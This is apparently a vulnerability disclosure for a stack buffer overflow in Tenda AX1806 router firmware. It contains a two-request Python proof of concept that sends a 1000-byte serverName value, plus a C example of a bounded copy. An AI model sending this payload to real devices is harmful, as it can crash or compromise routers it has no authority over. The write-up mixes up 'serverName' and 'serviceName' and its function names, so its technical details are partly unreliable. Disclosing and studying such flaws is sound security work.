Information

Vulns

serverName

Detail

Tenda AX1806 v1.0.0.1 contains a stack overflow via the serverName parameter in the function form_fast_setting_internet_set.

The form_fast_setting_internet_set function in Tenda AX1806 v1.0.0.1 first extracts the value of the netWanType parameter from the POST request and passes it to the sub_30930 function as the third parameter. Because the POST body is under our control, we set netWanType to 2, so sub_30930 receives 2 as its third parameter.


In the sub_30930 function, sprintf is used to build the wan1.connecttype string. SetValue is then called to set the environment variable wan1.connecttype to the third parameter a3 passed into sub_30930, which has the value 2.


Execution then moves to the fromAdvSetMacMtuWan function. Here, the value "2" that the POST request stored in the environment variable wan1.connecttype is read into v6, which triggers the execution of the sub_65A64 function.


The value of the serviceName parameter is extracted from the POST request and then passed to the strcpy function without a length check, resulting in a buffer overflow.
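The unchecked strcpy described above, next to a bounded replacement, as an added example that is not taken from the Tenda firmware. The function names and the 64-byte buffer size are assumptions made for illustration; the page does not give the real buffer size.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define NAME_BUF_SIZE 64 /* assumed size; the page does not give the real one */

/* The unsafe pattern from the write-up: strcpy() copies until the NUL in the
 * request value and never looks at the destination size. Shown for contrast. */
void copy_unchecked(char *dst, const char *req_value)
{
    strcpy(dst, req_value);
}

/* Bounded replacement: returns 0 on success, -1 if the value is missing or
 * does not fit (including its terminator). Over-long input is rejected, not
 * truncated, so a partial value is never stored. */
int copy_checked(char *dst, size_t dst_size, const char *req_value)
{
    size_t n = 0;
    if (dst == NULL || dst_size == 0)
        return -1;
    dst[0] = '\0';
    if (req_value == NULL)
        return -1;
    while (n < dst_size && req_value[n] != '\0')
        n++;
    if (n == dst_size)          /* no room left for the terminator */
        return -1;
    memcpy(dst, req_value, n + 1);
    return 0;
}

/* Hypothetical handler fragment: validates a request field into a stack buffer. */
int handle_server_name(const char *req_value)
{
    char name[NAME_BUF_SIZE];
    if (copy_checked(name, sizeof name, req_value) != 0)
        return -1;              /* caller should answer with an error */
    return (int)strlen(name);
}

int main(void)
{
    char big[1001];             /* constructed input: 1000 'a' bytes, as in the PoC */
    memset(big, 'a', 1000);
    big[1000] = '\0';
    printf("short: %d, oversized: %d\n", handle_server_name("isp-ac-01"), handle_server_name(big));
    return 0;
}
```

Rejecting the request outright keeps an over-long value from reaching the configuration store at all, which is why the checked copy returns an error instead of truncating.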


POC

import requests

# Step 1: set netWanType to 2 so that wan1.connecttype is stored as 2
url = "http://192.168.188.157/goform/SetIPTVCfg"
data = {
	"netWanType": 2,
	"adslUser": "aaaa",
	"adslPwd": "aaaa"
}
response = requests.post(url, data=data)

# Step 2: send an oversized serverName value to AdvSetMacMtuWan
url = "http://192.168.188.157/goform/AdvSetMacMtuWan"
payload = "a"*1000
data = {
	"wanMTU": 1285,
	"wanSpeed": 0,
	"cloneType": 0,
	"mac": "00:00:00:00:00:01",
	"serverName": payload
}
response = requests.post(url, data=data)
print(response.text)

serviceName

Detail

Tenda AX1806 v1.0.0.1 contains a stack overflow via the serverName parameter in the function form_fast_setting_internet_set.